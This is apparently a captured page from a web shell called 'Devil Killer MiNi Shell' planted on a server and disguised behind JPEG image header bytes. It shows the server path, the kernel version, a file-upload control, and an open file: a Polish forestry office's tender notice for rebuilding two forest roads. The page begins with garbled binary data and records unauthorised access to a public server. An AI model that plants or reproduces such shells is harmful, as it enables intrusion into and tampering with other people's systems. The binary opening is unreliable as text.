JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241016/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241016/0054937301-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa drogi leśnej nr 34 i 35 w leśnictwie Wierśnie i Pogorzelec </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Nadleśnictwo Głęboki Bród</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 790011240</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Głęboki Bród 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Giby</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">16-506</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL843 - Suwalski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">875165231</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">glebokibrod@bialystok.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.gleboki-brod.bialystok.lasy.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> leśnictwo </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa drogi leśnej nr 34 i 35 w leśnictwie Wierśnie i Pogorzelec </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a345faed-5711-4c2d-b063-9f286f7b7090</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00549373</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-10-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00331814/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Przebudowa drogi leśnej nr 34 i 35 w leśnictwie Pogorzelec i Wierśnie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> e-propublico.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W niniejszym postępowaniu komunikacja między Zamawiającym a Wykonawcami<br/>odbywa się przy użyciu środków komunikacji elektronicznej, za pośrednictwem platformy on-line działającej pod adresem https://epropublico.<br/>pl (dalej jako: ”Platforma”) lub poczty elektronicznej działającej pod adresem glebokibrod@bialystok.lasy.gov.pl, z<br/>zastrzeżeniem, że złożenie oferty następuje wyłącznie przy użyciu Platformy.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Na Platformie postępowanie prowadz.<br/>jest pod nazwą: ”Przebudowa drogi leśnej nr 34 i 35 w leśnictwie Wierśnie i Pogorzelec”– znak. spr: S.270.5.2024. Wykonawca<br/>przystępując do postęp. o udzielenie zamówienia publ., akceptuje warunki korzystania z Platformy określone w Regulaminie<br/>zamiesz. na stronie internetowej https://e-propublico.pl oraz uznaje go za wiążący. Wykonawca zamierzający wziąć udział w postęp.<br/>musi posiadać konto na Platformie. Do złożenia oferty konieczne jest posiadanie przez os. uprawn. do reprezent. Wykonawcy<br/>ważnego kwalifikowanego podpisu elektronicznego, podpisu zaufanego lub podpisu osobistego. Ilekroć w SWZ jest mowa o: a)podp.<br/>zaufanym – należy przez to rozumieć podpis, o kt. mowa art. 3 pkt 14a ustawy z 17.02.2005 r. o informatyzacji działal. podm. realiz.<br/>zadania publiczn; b)podpisie osobistym – należy przez to rozumieć podpis, o kt. mowa w art. z art. 2 ust. 1 pkt 9 ustawy z 6.08.2010<br/>r. o dow. osobistych. Zalecenia Zamaw. odnośnie kwalifikowanego podpisu elektroniczn.: a)dok. sporządzone i przesyłane w<br/>formacie .pdf zaleca się podpisywać kwalifikowanym podpisem elektronicznym w formacie PAdES; b) dokumenty sporządzone i<br/>przesyłane w formacie innym niż .pdf (np.: .doc, .docx, .xlsx, .xml) zaleca się podpisywać kwalifikowanym podpisem elektronicznym<br/>w formacie XAdES; c) do składania kwalifikowanego podpisu elektronicznego zaleca się stosowanie algorytmu SHA-2 (lub<br/>wyższego). Zamawiający określa następujące wymagania sprzętowo – aplikacyjne pozwalające na korzystanie z Platformy: a) stały<br/>dostęp do sieci Internet; b) posiadanie dowolnej i aktywnej skrzynki poczty elektronicznej (e-mail), c) komputer z zainstalowanym<br/>systemem operacyjnym Windows 7 (lub nowszym) albo Linux, d) zainstalowana dowolna przeglądarka internetowa - Platforma<br/>współpracuje z najnowszymi, stabilnymi wersjami wszystkich głównych przeglądarek internetowych (Internet Explorer 10+, Microsoft<br/>Edge, Mozilla Firefox, Google Chrome, Opera), e) włączona obsługa JavaScript oraz Cookies. Zamawiający dopuszcza następujący<br/>format przesyłanych danych:1) pliki w formatach określonych w załączniku nr 2 do Rozp. Rady Ministrów z dnia 12.04.2012 r w sp.<br/>Krajowych Ram Interoperacyjności, minim wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz<br/>minimalnych wymagań dla systemów teleinformatycznych, przy czym zaleca się wykorzystywanie plików w formacie .pdf, .doc,<br/>.docx, .xls, .xlsx; 2) w celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z rozszerzeń: .zip lub<br/>.7Z;<br/>3) maksymalny rozmiar pojedynczego pliku to 80 MB, przy czym nie określa się limitu liczby plików. Zamawiający określa<br/>następujące inf. na temat kodowania i czasu odbioru danych: a)załączony i przesłany przez Wykonawcę za pomocą Platformy plik<br/>oferty wraz z załącznikami, nie jest dostępny dla Zamaw. i przechow. jest na serwerach Platformy w formie zaszyfrowanej.<br/>Zamawiający otrzyma dostęp do pliku dopiero po upływie terminu otwarcia ofert; b) oznaczenie czasu odbioru danych przez<br/>Platformę stanowi przyporz. do dokumentu elektronicznego datę oraz dokładny czas (hh:mm:ss), widoczne przy wysłanym<br/>dokumencie w kolumnie ”Data przesłania”; c) o terminie przesłania decyduje czas pełnego przeprocesowania transakcji pliku na<br/>Platformie. W postęp., wszelkie oświadczenia, wnioski, zawiadomienia oraz inform. przekazywane są za pośrednictwem Platformy<br/>(karta ”Wiadomości”) oraz poczty elektronicznej. Za datę przekazania oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje<br/>się datę ich przekazania na adres poczty elektron. Zamawiającego: glebokibrod@bialystok.lasy.gov.pl lub złożenia na platformie e-<br/>ProPublico działającej pod adresem https://e-ProPublico.pl/. Ofertę, wraz ze stanow. jej integralną część załączn., składa się pod<br/>rygorem nieważności w formie elektronicznej lub postaci elektronicznej za pośrednictwem Platformy, podpis. kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający oświadcza, że spełnia wymogi określone w rozporządzeniu<br/>Parlamentu Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z<br/>przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne<br/>rozporządzenie o ochronie danych) (Dz.U. UE L 119 z 4 maja 2016 r.), dalej: RODO, tym samym dane osobowe podane przez<br/>Wykonawcę będą przetwarzane zgodnie z RODO oraz zgodnie z przepisami krajowymi.<br/>Zamawiający informuje, że:<br/>1) administratorem danych osobowych Wykonawcy jest Państwowe Gospodarstwo Leśne Lasy Państwowe reprezentujące Skarb<br/>Państwa Nadleśnictwo Głęboki Bród, Głęboki Bród 4 , 16-506 Giby.<br/>Tel.: 87 5165203; 5165231; 5165403;,<br/>e-mail: glebokibrod@bialystok.lasy.gov.pl 2) administrator wyznaczył Pełnomocnika ds. Ochrony Danych Osobowych p. Emilia Ławniczak, z którym w sprawach dotyczących<br/>przetwarzania danych osobowych można skontaktować się za pośrednictwem poczty elektronicznej pod adresem<br/>emilia.lawniczak@projektpdp.pl;<br/>3) dane osobowe Wykonawcy będą przetwarzane w celu przeprowadzenia postępowania o udzielenie zamówienia publicznego pn.<br/>Przebudowa drogi leśnej nr 34 i 35 w leśnictwie Wierśnie i Pogorzelec – znak sprawy: S.270.5.2024 oraz w celu archiwizacji<br/>dokumentacji dotyczącej tego postępowania;<br/>4) odbiorcami przekazanych przez Wykonawcę danych osobowych będą osoby lub podmioty, którym zostanie udostępniona<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy Pzp;<br/>5) dane osobowe Wykonawcy będą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli okres obowiązywania umowy w sprawie zamówienia publicznego przekracza 4 lata,<br/>okres przechowywania obejmuje cały okres obowiązywania umowy.<br/>Wykonawca jest zobowiązany, w związku z udziałem w przedmiotowym postępowaniu, do wypełnienia wszystkich obowiązków<br/>formalno-prawnych wymaganych przez RODO i związanych z udziałem w przedmiotowym postępowaniu o udzielenie zamówienia.<br/>Do obowiązków tych należą:<br/>1) obowiązek informacyjny przewidziany w art. 13 RODO względem osób fizycznych, których dane osobowe dotyczą i od których<br/>dane te Wykonawca bezpośrednio pozyskał i przekazał Zamawiającemu w treści oferty lub dokumentów składanych na żądanie<br/>Zamawiającego;<br/>2) obowiązek informacyjny wynikający z art. 14 RODO względem osób fizycznych, których dane Wykonawca pozyskał w sposób<br/>pośredni, a które to dane Wykonawca przekazuje Zamawiającemu w treści oferty lub dokumentów składanych na żądanie<br/>Zamawiającego.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający informuje, że;<br/>1) udostępnia dane osobowe, o których mowa w art. 10 RODO (dane osobowe dotyczące wyroków skazujących i czynów<br/>zabronionych) w celu umożliwienia korzystania ze środków ochrony prawnej, o których mowa w dziale IX ustawy Pzp, do upływu<br/>terminu na ich wniesienie;<br/>2) udostępnianie protokołu i załączników do protokołu ma zastosowanie do wszystkich danych osobowych, z wyjątkiem tych, o<br/>których mowa w art. 9 ust. 1 RODO (tj. danych osobowych ujawniających pochodzenie rasowe lub etniczne, poglądy polityczne,<br/>przekonania religijne lub światopoglądowe, przynależność do związków zawodowych oraz przetwarzania danych genetycznych,<br/>danych biometrycznych w celu jednoznacznego zidentyfikowania osoby fizycznej lub danych dotyczących zdrowia, seksualności lub<br/>orientacji seksualnej tej osoby), zebranych w toku postępowania o udzielenie zamówienia;<br/>3) w przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez Zamawiającego, z uprawnienia, o którym<br/>mowa w art. 15 ust. 1–3 RODO (związanych z prawem Wykonawcy do uzyskania od administratora potwierdzenia, czy<br/>przetwarzane są dane osobowe jego dotyczące, prawem Wykonawcy do bycia poinformowanym o odpowiednich zabezpieczeniach,<br/>o których mowa w art. 46 RODO, związanych z przekazaniem jego danych osobowych do państwa trzeciego lub organizacji<br/>międzynarodowej oraz prawem otrzymania przez Wykonawcę od administratora kopii danych osobowych podlegających<br/>przetwarzaniu), Zamawiający może żądać od osoby występującej z żądaniem wskazania dodatkowych informacji, mających na celu<br/>sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia;<br/>4) skorzystanie przez osobę, której dane osobowe są przetwarzane, z uprawnienia, o którym mowa w art. 16 RODO (uprawnienie do<br/>sprostowania lub uzupełnienia danych osobowych), nie może naruszać integralności protokołu postępowania oraz jego załączników;<br/>5) w postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 RODO,<br/>nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania;<br/>6) w przypadku, gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 RODO spowoduje ograniczenie<br/>przetwarzania danych osobowych zawartych w protokole postępowania lub załącznikach do tego protokołu, od dnia zakończenia<br/>postępowania o udzielenie zamówienia Zamawiający nie udostępnia tych danych, chyba że zachodzą przesłanki, o których mowa w<br/>art. 18 ust. 2 rozporządzenia 2016/679.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">S.270.5.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przebudowa drogi leśnej 34 i 35 w leśnictwie Wierśnie i Pogorzelec na odcinku 0+000,00 do 2+322,34 gmina Giby, powiat<br/>sejneński.<br/>Celem planowanych i projektowanych robót jest dostosowanie parametrów technicznych istniejącej drogi w zakresie<br/>przekroju i konstrukcji jezdni do przenoszenia obciążeń od pojazdów wysokotonażowych, maszyn i środków transportu<br/>uczestniczących w prowadzonej gospodarce leśnej oraz umożliwienia dojazdu pojazdów specjalnych na wypadek<br/>zagrożenia pożarowego. Ze względu na uwarunkowania formalne, tryb postępowania i specyfikę zadania – skrzyżowanie z linią kolejki wąskotorowej<br/>w km 1+413,20 (odc. Strefy 2 objęty na długości 200,00 m.b. opieką konserwatora zabytków) – cała droga podlegająca<br/>przebudowie (zgodnie z dokumentacją projektową) została podzielona na trzy odcinki:<br/>- odcinek 1 od km 0+000,00 do km 1+313,20<br/>- odcinek 2 od km 1+313,20 do km 1+513,20<br/>- odcinek 3 od km 1+513,20 do km 2+322,34 (KT)<br/>Etap pierwszy realizacji zadania obejmuje (zgodnie z dokumentacją projektową) zakres na odcinkach 1 i 3 (1313,20 +<br/>809,14 mb), a etap drugi obejmuje zakres odcinka 2 (200,00 mb).<br/>Drogę zaprojektowano po trasie jej dotychczasowego przebiegu, dokonując (dla odcinków 1 i 3) nieznacznych korekt w<br/>miejscach załamań osi trasy i punktów charakterystycznych, które opisano jako punkty wierzchołkowe (W1 do W10) z<br/>podaniem współrzędnych. Zaprojektowano jezdnię o przekroju jednopasowym o szerokości 3,50 m z obustronnymi<br/>poboczami o szerokości po 0,75 m. Projektowana geometria drogi została przedstawiona na planie sytuacyjnym (rys nr 1-4<br/>dla odc. 1 i 3, oraz rys. nr 2 dla odc. 2)<br/>Na odc. 1 i 3 w ciągu projektowanej drogi leśnej zlokalizowano mijanki w lokalizacjach uzgodnionych z Inwestorem i<br/>odległościach ok. 300 m. Szerokość mijanek wynosi 2,50 m. Długość mijanek wynosi 18,0+23,0+18,0 mb.<br/>Zjazdy z drogi głównej powinny mieć przekrój daszkowy o pochyleniu 3,0% Szerokość zjazdów wynosi 3,50 m, pobocza<br/>0,75 m, długość 10,00 mb. Projektowane parametry techniczne drogi:<br/>- prędkość projektowana Vp = 30 km/h<br/>- szerokość korony drogi - 5,0 m<br/>- szerokość jezdni - 3,5 m<br/>- przekrój poprzeczny - daszkowy od 2,0% do 3,0% (dla odcinka 2 – 2,0%)<br/>- szerokość poboczy – 2 x 0,75 m<br/>- pochylenie poprzeczne poboczy - 6,0%<br/>- rowy trójkątne<br/>- nachylenie skarp 1:1,5 i przeciwskarp: 1:1,5<br/>- mijanki (na odcinkach 1 i 3) o wymiarach 18,0 + 23,0 + 18,0 m, szer. 2,5 m<br/>- skosy na mijankach: 1:7<br/>- min. spadek podłużny rowów 0,2%, max. 2%<br/>- nawierzchnia między torami i na zewnętrznych dojazdach do torowiska z płyt betonowych ażurowych grub. 10 cm (dot. odcinka 2)<br/>Rozwiązania wysokościowe niwelety:<br/>Niweletę drogi należy prowadzić pod kątem maksymalnego dostosowania do istniejącego terenu i torowiska (odc. 2) uwzględniając minimalne korekty istniejącego ukształtowania wysokościowego terenu oraz dowiązując się do rozwiązań odcinków 1 i 3.<br/>Konstrukcja nawierzchni:<br/>Przyjęto następujący przekrój konstrukcyjny drogi, zjazdów, mijanek:<br/>- warstwa ścieralna z kruszywa naturalnego stabilizowanego mechanicznie 0/31,5 mm doziarnionego w 50% kruszywem łamanym, gr. 12 cm,<br/>- podbudowa z kruszywa naturalnego 0/31,5 stabilizowanego mechanicznie, gr. 15 cm,<br/>- podłoże zagęszczone do Is = min 0,97<br/>Pobocza:<br/>- z kruszywa naturalnego 0/31,5 stabilizowanego mechanicznie, gr. 15 cm </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233123-7 - Roboty budowlane w zakresie dróg podrzędnych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">50 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający stosować będzie niżej podane<br/>kryteria:<br/>Cena 60 %<br/>Termin realizacji 20 %<br/>Okres gwarancji 20 %<br/>1. Cena<br/>Liczba punktów = ( Cmin/Cof ) * 100 * waga<br/>gdzie:<br/>- Cmin - najniższa cena spośród wszystkich ofert<br/>- Cof - cena podana w badanej ofercie<br/>W tym kryterium Wykonawca będzie mógł uzyskać maksymalnie 60,00 punktów. Przyznane punkty zostaną zaokrąglone do dwóch<br/>miejsc po przecinku.<br/>Kryterium cena będzie rozpatrywane na podstawie ceny brutto za wykonanie przedmiotu zamówienia, podanej przez Wykonawcę w<br/>formularzu ofertowym<br/>2. Termin realizacji<br/>Liczba punktów = (Tmin/Tof)*100*waga<br/>Tmin – najkrótszy oferowany termin<br/>- Tof -termin podany w badanej ofercie.<br/>Termin realizacji zamówienia należy podać w formularzu ofertowym w dniach.<br/>W tym kryterium Wykonawca będzie mógł uzyskać maksymalnie 20,00 punktów. Przyznane punkty zostaną zaokrąglone do dwóch<br/>miejsc po przecinku. Maksymalny termin realizacji przedmiotu zamówienia wymagany przez Zamawiającego wynosi 50 dni. Podanie<br/>w ofercie terminu realizacji w ilości 50 dni spowoduje, że w ramach tego kryterium oceny ofert wykonawca uzyska 0,00 punktów.<br/>Podanie w ofercie terminu realizacji zamówienia dłuższego niż 50 dni będzie skutkowało odrzuceniem oferty na podstawie art. 226<br/>ust. 1 pkt 5 Pzp („Zamawiający odrzuca ofertę, jeżeli jej treść jest niezgodna z warunkami zamówienia”).<br/>3. Okres gwarancji<br/>Liczba punktów = ( Gof/Gmax ) * 100 * waga<br/>gdzie:<br/>- Gof – okres gwarancji podany w badanej ofercie<br/>- Gmax – maksymalny okres gwarancji spośród wszystkich ofert.<br/>Oferowany okres gwarancji należy podać w formularzu ofertowym.<br/>Okres gwarancji wymagany przez Zamawiającego wynosi 36 miesięcy, za zaoferowanie okresu gwarancji w ilości 36 miesięcy nie<br/>zostaną przyznane punkty. Maksymalny okres gwarancji jaki może zostać zaoferowany to 60 miesięcy. Maksymalna ilość punktów<br/>możliwa do uzyskania wynosi 20,00.<br/>W przypadku podania przez wykonawcę w formularzu oferty okresu gwarancji dłuższego niż 60 miesięcy:<br/>1) do oceny ofert zostanie przyjęty okres gwarancji wynoszący 60 miesięcy,<br/>2) do umowy zostanie wpisany okres gwarancji podany w formularzu oferty.<br/>W przypadku podania przez wykonawcę w formularzu oferty okresu gwarancji krótszego niż 36 miesięcy, oferta wykonawcy zostanie<br/>odrzucona na podstawie art. 226 ust. 1 pkt 5 Pzp („Zamawiający odrzuca ofertę, jeżeli jej treść jest niezgodna z warunkami<br/>zamówienia”).<br/>W przypadku braku informacji o udzielonej gwarancji zamawiający przyjmie, iż Wykonawca oferuje okres gwarancji 36 miesięcy. Po dokonaniu oceny punkty przyznane przez Komisję przetargową zostaną zsumowane dla każdego z kryteriów oddzielnie. Suma<br/>punktów uzyskanych za wszystkie kryteria oceny stanowić będzie końcową ocenę danej oferty.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz 